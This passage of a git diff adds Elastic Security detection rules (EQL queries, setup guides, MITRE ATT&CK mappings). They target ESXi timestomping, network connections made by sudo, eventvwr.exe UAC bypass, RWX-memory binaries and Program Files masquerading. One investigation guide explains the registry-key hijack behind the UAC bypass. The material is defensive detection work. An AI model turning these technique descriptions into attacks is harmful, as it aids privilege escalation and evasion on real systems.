] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_8.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_8.json new file mode 100644 index 00000000000..2dcb8510534 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_8.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where the 'touch' command is executed on a Linux system with the \"-r\" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as \"/etc/vmware/\", \"/usr/lib/vmware/\", or \"/vmfs/*\". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ESXI Timestomping using Touch Command", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"touch\" and process.args == \"-r\" and\nprocess.args : (\"/etc/vmware/*\", \"/usr/lib/vmware/*\", \"/vmfs/*\")\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.006", + "name": "Timestomp", + "reference": "https://attack.mitre.org/techniques/T1070/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/30e1e9f2-eb9c-439f-aff6-1e3068e99384_2.json b/packages/security_detection_engine/kibana/security_rule/30e1e9f2-eb9c-439f-aff6-1e3068e99384_2.json new file mode 100644 index 00000000000..ccab693fc7f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/30e1e9f2-eb9c-439f-aff6-1e3068e99384_2.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects network connections initiated by the \"sudo\" binary. This behavior is uncommon and may occur in instances where reverse shell shellcode is injected into a process run with elevated permissions via \"sudo\". Attackers may attempt to inject shellcode into processes running as root, to escalate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Network Connection via Sudo Binary", + "query": "network where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"connection_attempted\", \"ipv4_connection_attempt_event\") and process.name == \"sudo\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "30e1e9f2-eb9c-439f-aff6-1e3068e99384", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.008", + "name": "Ptrace System Calls", + "reference": "https://attack.mitre.org/techniques/T1055/008/" + } + ] + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "30e1e9f2-eb9c-439f-aff6-1e3068e99384_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_111.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_111.json new file mode 100644 index 00000000000..e37a58f0103 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_111.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Bypass UAC via Event Viewer", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_112.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_112.json new file mode 100644 index 00000000000..7db32725ef6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_112.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Bypass UAC via Event Viewer", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32300431-c2d5-432d-8ec8-0e03f9924756_1.json b/packages/security_detection_engine/kibana/security_rule/32300431-c2d5-432d-8ec8-0e03f9924756_1.json new file mode 100644 index 00000000000..03b7b91d54f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32300431-c2d5-432d-8ec8-0e03f9924756_1.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of a unix binary with read, write and execute memory region permissions, followed by a network connection. The mprotect() system call is used to change the access protections on a region of memory that has already been allocated. This syscall allows a process to modify the permissions of pages in its virtual address space, enabling or disabling permissions such as read, write, and execute for those pages. RWX permissions on memory is in many cases overly permissive, and should (especially in conjunction with an outbound network connection) be analyzed thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection from Binary with RWX Memory Region", + "query": "sample by host.id, process.pid, process.name\n /* auditd.data.a2 == \"7\" translates to RWX memory region protection (PROT_READ | PROT_WRITE | PROT_EXEC) */\n [process where host.os.type == \"linux\" and auditd.data.syscall == \"mprotect\" and auditd.data.a2 == \"7\"]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and\n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", + "references": [ + "https://man7.org/linux/man-pages/man2/mprotect.2.html" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "32300431-c2d5-432d-8ec8-0e03f9924756", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S mprotect\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "32300431-c2d5-432d-8ec8-0e03f9924756_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_108.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_108.json new file mode 100644 index 00000000000..a29627e90e7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_108.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution from a directory masquerading as the Windows Program Files directories. These paths are trusted and usually host trusted third party programs. An adversary may leverage masquerading, along with low privileges to bypass detections allowlisting those folders.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Program Files Directory Masquerading", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"C:\\\\*Program*Files*\\\\*.exe\" and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Downloaded Program Files\\\\*.exe\",\n 